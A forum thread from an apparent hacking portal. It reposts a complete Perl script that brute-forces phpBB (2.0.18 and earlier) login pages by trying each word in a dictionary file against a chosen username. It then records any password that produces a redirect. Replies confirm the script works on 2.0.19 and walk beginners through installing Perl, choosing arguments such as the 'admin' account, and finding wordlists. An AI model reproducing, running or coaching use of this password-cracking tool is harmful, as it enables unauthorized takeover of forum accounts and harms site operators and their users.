Waraxe IT Security Portal

syntax9 · Active user

# Will be moved to tools section when completed. /str0ke

#!/usr/bin/perl
############################################
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionnary attack
# Solutions: None official , but many solutions are possible Wink

# Note: If a line of the dictionnary file contain no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
############################################
use IO::Socket;

#--------------Utilisation--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+---------------------------------------------------------------------------------+
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}

#--------------Data--------------#
$host = $ARGV[0];
$path = $ARGV[1];
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
$OK = 0;
$referer = "http://"."$host"."$path"."login.php?redirect=";
$postit = "$path"."login.php";

#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
+---------------------------------------------------------+";

#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length = length $request;
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}

#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);

#-------------Success---------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}

#-------------Failed-----------------#
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}

# milw0rm.com [2005-12-21]

Vixje · Active user

This also works on .19 versions?

--Edit--

yes it does Very Happy

anton · Beginner

I'm new in this zone so please be good with me .
How I can use this code ? I see the movie but I don't understand how to launch the code and where to do that Sad

maybe is easy for you but I'm a stupid beginer Sad

Vixje · Active user

Copy the text and paste it into a file called f.e. script.pl

now download perl and install it.

now run: perl.exe script.pl, and follow instructions.

gl

dinho · Regular user

hi guyz

what exactly should i type after C:\perl\bin\file.pl .... !!!

sljyro · Advanced user

the 6 arguments, each followed by a 'space'

dinho · Regular user

how do i get these two files
??
<pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +

+ <file_result> => File you want to log activity | [Ex: results.txt]

so it should look like this:

C:\per\bin\file.pl localhost.com /forum/ 80 dico.txt admin results.txt

how do i set up dico.txt and results.txt??

thanks in advance brov Wink

Chb · Valuable expert

sljyro · Advanced user

you can get a dictionary file here (3mb txt file)
http://www.csit.fsu.edu/~burkardt/data/txt/txt.html

but take note that these are only words, if the password contains a capital letter, number or it's not a word, its useless. main disadvantage of this type of hack i would say.

and another issue, when i try this, i keep getting disconnected after a minute or so, dont know why Confused